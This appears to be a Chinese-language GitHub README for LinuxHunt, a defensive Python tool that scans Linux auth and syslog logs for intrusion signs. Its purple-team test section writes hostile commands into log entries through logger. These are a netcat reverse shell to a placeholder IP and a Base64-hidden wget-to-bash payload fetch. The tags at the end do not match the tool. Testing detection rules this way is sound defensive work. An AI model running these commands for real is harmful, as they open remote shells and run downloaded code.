Spellskite-coding/LinuxHunt
GitHub: Spellskite-coding/LinuxHunt
LinuxHunt 是一款零依赖的 Linux 安全日志威胁狩猎命令行工具,帮助安全团队在 Debian/Ubuntu 环境中快速检测恶意行为和入侵指标。
Stars: 0 | Forks: 0
# 🕵️♂️ LinuxHunt
**LinuxHunt** 是一款轻量级、无依赖的命令行 Threat Hunting 工具,专为快速分析现代 Linux 系统(Debian、Ubuntu 等)上的安全日志而设计。
作为 Linux 环境下 *DeepBlueCLI* 的替代方案,这款完全使用 Python 3 标准库开发的工具,旨在帮助 SOC 分析师、事件响应团队(DFIR)和 Purple Teams 无需部署复杂的 agent 即可快速识别妥协指标(IoC)。
## ✨ 主要功能
* **零依赖:** 不需要任何外部模块(无需 `pip install`)。非常适合受限或隔离环境。
* **集成 `systemd-journald`:** 通过 `journalctl` 直接查询日志,并支持动态时间管理(`--since`)。
* **安全性与健壮性:**
* 自动清理 ANSI 转义序列,以防止日志伪造(Log Forging / Terminal Injection)攻击。
* 对用户输入进行严格验证,以防止命令注入。
* 预编译正则表达式,并在遭受大规模攻击时提供防 OOM(Out-Of-Memory)保护。
* **自动化检测:**
* **`auth` 模块:** 检测 SSH/PAM 暴力破解、新用户创建,以及通过 `sudo` 或 `su` 执行的可疑命令。
* **`syslog` 模块:** 检测反取证行为(清除历史记录)、reverse shell、可疑下载(`wget`/`curl`),以及实时解码 Base64 编码的恶意 payload。
## 🚀 安装
只需克隆此仓库并运行脚本即可:
git clone [https://github.com/Spellskite-coding/LinuxHunt](https://github.com/Spellskite-coding/LinuxHunt)
cd LinuxHunt
## 🛠️ 使用方法
该工具需要 elevated 权限(sudo)才能访问系统的安全日志。
- 基本语法:
sudo python3 linuxhunt.py -j -t -s ""
## 分析示例
- 分析过去 24 小时内的身份验证尝试:
sudo python3 linuxhunt.py -j -t auth -s "24 hours ago"
- 追踪当天可疑的命令或 payload 执行情况:
sudo python3 linuxhunt.py -j -t syslog -s "today"
- 分析旧的静态日志文件(离线模式):
sudo python3 linuxhunt.py -f /var/log/auth.log.1 -t auth
## 🎯 Purple Teaming:模拟攻击以测试工具
您可以使用 logger 命令向系统日志中注入虚假痕迹,以此来测试检测规则的有效性。
- 模拟反取证(清除痕迹):
logger "user root attempted track covering: history -c"
- 模拟 Reverse Shell:
logger "type=EXECVE COMMAND=nc -e /bin/bash 10.0.0.0 4444"
- 模拟执行 Base64 隐藏的 payload:
logger "type=EXECVE COMMAND=echo d2dldCBodHRwOi8vc2FmZWJsdWVjb25zZWlsLmZyL3BheWxvYWQuc2g= | base64 -d | bash"
# 然后对过去 5 分钟的内容运行检测:
sudo python3 linuxhunt.py -j -t syslog -s "5 minutes ago"
祝您调查顺利! :)
标签:CSV导出, PB级数据处理, Python, 子域名变形, 安全运维, 无后门